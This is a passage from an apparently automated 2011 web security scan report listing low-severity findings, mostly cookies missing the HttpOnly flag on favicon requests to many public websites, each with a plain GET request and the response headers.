The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ticketmaster.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "57e-b383d900"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:24:52 GMT
Connection: close
Set-Cookie: SID=nD7GlUEnkxIP7ANtKRu_CqupVk7ohnaWjtsXe2PfX3lEBQ0y0XLy9mY0z8iGhhi7LrunY3_V4W0yuO2C; path=/; domain=.ticketmaster.com
Set-Cookie: BID=lz41VXDuH8Qe3yaFuANwwdc3BoxcSfn9rNCei9TRY0xbrM0XOwjSaO9-SbjUBaNKf_diTAs_bb8iLBHP7ztS; path=/; domain=.ticketmaster.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=NVcfObc34CW8xvG3eaHZhEljjPhSeod21tXLKa8jNojh1fiM0CkpSQ==; path=/

..............h.......(....... ...........@............................wf.....U3".....3.......fUD.D"......wfU...w.........fD3.3.......D...U"..U3..f3".............wUD.wUU..fU...........................
...[SNIP]...

14.196. http://www.totalbeauty.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalbeauty.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.totalbeauty.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:28:30 GMT
Last-Modified: Tue, 22 Mar 2011 01:23:28 GMT
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
_onnection: keep-alive
Via: CN-5000
Set-Cookie: cresist=43C93BCA00001F90; path=/
Proxy-Connection: Keep-Alive

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

14.197. http://www.tracfone.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tracfone.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tracfone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: TFWirelessA=R2837728125; path=/; expires=Sat, 02-Apr-2011 14:03:25 GMT
Date: Sat, 02 Apr 2011 13:33:18 GMT
Accept-Ranges: bytes
Content-Length: 1078
Last-Modified: Wed, 04 Mar 2009 22:02:34 GMT
x-wily-servlet: Clear appServerIp=10.248.45.11&agentName=TRAC&servletName=FileServlet&servletResponseTime=0&agentHost=dp-web1&agentProcess=WebLogic
X-Powered-By: Servlet/2.5 JSP/2.1
x-wily-info: Clear guid=166AF1570AF82D0B01733919685DAB4D

...... ..........&...........(.......(... ...@.................................................................................................fffff...........fffff.........fff....fh.......fff....fh.
...[SNIP]...

14.198. http://www.travelocity.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelocity.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:08 GMT
Server: Apache
Set-Cookie: TVLY_GEO=|||||; path=/; domain=.travelocity.com; expires=Sat, 02-Apr-2011 16:28:08 GMT
Set-Cookie: tyrg1st=8FE61A00E4F9500A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.travelocity.com
Last-Modified: Tue, 30 Mar 2004 00:21:00 GMT
ETag: "57e"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding
Connection: close
Content-Type: image/x-icon

..............h.......(....... .....................................9......X...[....|...S...........Z.....C...Y....V..Y.....6..U......../...7...*..d*.....Z.....N..h....S.......C.......)..n..f.....t.I.
...[SNIP]...

14.199. http://www.true.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.true.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.true.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 20 Jul 2004 18:39:21 GMT
Accept-Ranges: bytes
ETag: "8012ddf886ec41:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:39 GMT
Content-Length: 894
Set-Cookie: NSC_xxx-mc-hsq=445337273660;path=/;domain=true.com

..............h.......(....... ...............H...H......................................................................................................................0.}%..*..*.(..*..*.|#..P......
...[SNIP]...

14.200. http://www.tvtxtr.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvtxtr.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tvtxtr.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 21 Sep 2010 00:48:39 GMT
Accept-Ranges: bytes
ETag: "4e8d62bb2659cb1:0"
Server: Microsoft-IIS/7.0
Date: Sat, 02 Apr 2011 14:16:49 GMT
Content-Length: 5430
Set-Cookie: BIGipServerpool-173.203.135.154-TVT-WWW=2684463296.20480.0000; path=/

............ .h...&... .... .........(....... ..... .....................................................................................................................i...&g..Jq....D...............
...[SNIP]...

14.201. http://www.uhaul.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uhaul.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uhaul.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Fri, 13 Aug 2010 17:37:08 GMT
Accept-Ranges: bytes
ETag: "3bc28f27e3bcb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: TLTSID=0F8F14C64A2E7D1EA96C289BDA4E02E6; Path=/; Domain=.uhaul.com
Set-Cookie: TLTUID=0F8F14C64A2E7D1EA96C289BDA4E02E6; Path=/; Domain=.uhaul.com; expires=Sat, 02-04-2021 13:57:29 GMT
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:57:28 GMT
Content-Length: 1438

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...

14.202. http://www.united.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.united.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.united.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8a
Set-Cookie: v1st=DDE5B3A5816CD2D9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.united.com
Last-Modified: Fri, 04 Mar 2011 06:10:29 GMT
Accept-Ranges: bytes
Content-Length: 894
Content-Type: image/x-icon
Set-Cookie: fullsite
Set-Cookie: NSC_Vojufe_HSQ=ffffffffd25f668d45525d5f4f58455e445a4a423660;Version=1;path=/;httponly

..............h.......(....... ....................................g.e>.....k....H%.zX....O#...._....=..1..3..g@.Z7.......H..Y4........x..i.=.......`8.,..3..qN.>.........s./..wU....xV..m.vS.......vT
...[SNIP]...

14.203. http://www.usa-people-search.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usa-people-search.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usa-people-search.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:53 GMT
Set-Cookie: iqf5cookie=352823488.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

14.204. http://www.veoh.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.veoh.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Set-Cookie: veohCookie="VisitorUID=D44A495F-8033-AE3D-9C5D-F70504C464C9&LastUpdate=02/Apr/2011:06:34:13 -0700&first=0"; domain=.veoh.com; Expires=Wed, 01 Apr 2015 13:34:13 GMT; Path=/
Content-Length: 2550
Date: Sat, 02 Apr 2011 13:34:13 GMT
Last-Modified: Thu, 31 Mar 2011 10:42:18 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
Content-Type: image/x-icon

..............h...&......... .h.......(....... ................................r............J.......J.......v...........J...........b.......F...>...........2.......J.......V...:...F...>......."...>...
...[SNIP]...

14.205. http://www.verisign.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verisign.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:34 GMT
Server: Apache
Set-Cookie: v1st=1ECA364D37B527F1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
ETag: "28e933b-1536-49a38fa8970c0"
Accept-Ranges: bytes
Content-Length: 5430
Content-Type: text/html

...[SNIP]...

14.206. http://www.videobash.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.videobash.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videobash.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:08 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: is_really_pc=1; expires=Sun, 03-Apr-2011 13:34:08 GMT
Set-Cookie: vbvisit=1; path=/
Connection: close
Content-Type: text/html
Set-Cookie: RNLBSERVERID=ded543; path=/
Content-Length: 37609

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   <head>
       <meta prop
...[SNIP]...

14.207. http://www.virtualtourist.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtualtourist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.virtualtourist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Jetty(6.1.14)
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:53:04 GMT
Accept-Ranges: bytes
Set-Cookie: VTT=64.14.197.3.1301752384.816877; Path=/; Domain=.virtualtourist.com
Last-Modified: Tue, 15 Mar 2011 01:29:34 GMT
Content-Length: 708

...[SNIP]...

14.208. http://www.vistaprint.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vistaprint.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vistaprint.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Tue, 28 Dec 2010 18:23:24 GMT
Accept-Ranges: bytes
P3P: CP="VPRT "
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:31:15 GMT
Connection: close
Set-Cookie: v1st=CA22C9248E11B2CF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.vistaprint.com

...[SNIP]...

14.209. http://www.wachovia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wachovia.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wachovia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:33:41 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=D2B46F245D2D105D5E8AE140D73CF7D1; Path=/; Domain=.wachovia.com
Location: https://www.wachovia.com/favicon.ico
Vary: Accept-Encoding
Content-Length: 244
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.wachovia.co
...[SNIP]...

14.210. http://www.warnerbros.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.warnerbros.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.warnerbros.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:00 GMT
Server: Apache
X-WBOL-WebServer: www_us
Set-cookie: WBWTID=173.193.214.243-4D97255037F000006CE1590-www-wb-web13; path=/; expires=Friday, 01-Jan-10 12:00:00 GMT; domain=.warnerbros.com;
Last-Modified: Thu, 27 Mar 2008 22:51:38 GMT
ETag: "6174a9-47e-737b280"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon

...[SNIP]...

14.211. http://www.webs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webs.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: FW_PIN_HASH=R728070988; path=/
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1406-1296536635000"
Last-Modified: Tue, 01 Feb 2011 05:03:55 GMT
Content-Length: 1406
Date: Sat, 02 Apr 2011 13:31:25 GMT

...[SNIP]...

14.212. http://www.wellsfargo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellsfargo.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wellsfargo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Sat, 02 Apr 2011 12:43:51 GMT
Content-length: 1150
Content-type: image/x-icon
Set-Cookie: v1st=6F0DE9B2A6C80BB2; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Last-modified: Thu, 06 Jan 2011 21:04:58 GMT
Etag: "47e-4d262e7a"
Accept-ranges: bytes

...[SNIP]...

14.213. http://www.whitepages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitepages.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whitepages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 12:38:12 GMT
Status: 200 OK
X-Runtime: 0.02908
ETag: "509dbed9826a8b82280d864c43c645da"
Connection: keep-alive
Set-Cookie: search_beta_test_110331=1; domain=.whitepages.com; path=/; expires=Mon, 02 Apr 2012 12:38:12 GMT
Set-Cookie: wp_endemic_provider=C; domain=.whitepages.com; path=/; expires=Sun, 03 Apr 2011 00:38:12 GMT
Set-Cookie: wp_perm=pid%3DEokXfl0mEeCcYwAfKWTiIA; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:12 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:12 GMT
Set-Cookie: _wpn_sid=dc1ba6490e45f104f1df0d2749bceada; domain=.whitepages.com; path=/
Content-Length: 20020

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Free Peo
...[SNIP]...

14.214. http://www.wildgames.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wildgames.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wildgames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://www.wildtangent.com/?dp=wildgames
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:27:21 GMT
Content-Length: 163
Set-Cookie: wgn_persist=553715722.6688.0000; path=/

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.wildtangent.com/?dp=wildgames">here</a></body>

14.215. http://www.wirefly.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wirefly.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wirefly.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 824
Content-Type: image/x-icon
Last-Modified: Thu, 05 Mar 2009 20:20:14 GMT
Accept-Ranges: bytes
ETag: "23deeccacf9dc91:2604"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
P3P: CP="NON DSP COR TAIa OUR IND STA", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:49 GMT
Set-Cookie: BIPcookie=snBNk9ar5ACTycf2Qgftv348PLaqh7aAyO+dcsy7xNS5dzQsxj7mGpR4LDsy9W5g7FRqOXsj; expires=Sat, 02-Apr-2011 13:46:50 GMT; path=/

...[SNIP]...

14.216. http://www.wsbtv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wsbtv.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wsbtv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 15 Jan 2010 20:07:02 GMT
ETag: "111f567-37e-8bfc0580"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain
Cache-Control: max-age=284
Expires: Sat, 02 Apr 2011 13:55:18 GMT
Date: Sat, 02 Apr 2011 13:50:34 GMT
Connection: close
Set-Cookie: alpha=47ce8f18567b0000aa29974d429400007e2b0000; expires=Tue, 30-Mar-2021 13:50:34 GMT; path=/; domain=.wsbtv.com

...[SNIP]...

14.217. http://www.xe.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xe.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xe.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:24 GMT
Server: Apache
Set-Cookie: ID=173.193.214.243.1301752224347582; path=/; expires=Fri, 28-Mar-31 13:50:24 GMT
Last-Modified: Fri, 03 Sep 2010 13:21:25 GMT
ETag: "3780f7-f1-ceba7f40"
Accept-Ranges: bytes
Content-Length: 241
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
Connection: close
Content-Type: text/html

<HTML>
<HEAD><TITLE>Autoextraction Prohibited</TITLE></HEAD>
<BODY>
Automated extraction of our content is prohibited. See <A HREF="http://www.xe.com/errors/noautoextract.htm">http://www.xe.com/error
...[SNIP]...

14.218. http://www.yellowpages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:06 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: image/x-icon
Content-Length: 5430
Last-Modified: Fri, 01 Apr 2011 18:42:25 GMT
Expires: Mon, 02 May 2011 12:43:06 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT

...[SNIP]...

14.219. http://www.zillow.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zillow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:33 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 13:36:34 GMT
ETag: W/"22382-1284155361000"
Last-Modified: Fri, 10 Sep 2010 21:49:21 GMT
Content-Length: 22382
Set-Cookie: BIGipServertomcat_pool_0=3423341066.0.0000; path=/
Via: 1.1 www.zillow.com
Vary: User-Agent
Content-Type: image/x-icon
Set-Cookie: BIGipServerapache_pool_0=2601257482.0.0000; path=/

...[SNIP]...

15. Password field with autocomplete enabled
There are 4 instances of this issue:


15.1. http://www.collegehumor.com/favicon.ico

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:35:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:35:37 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
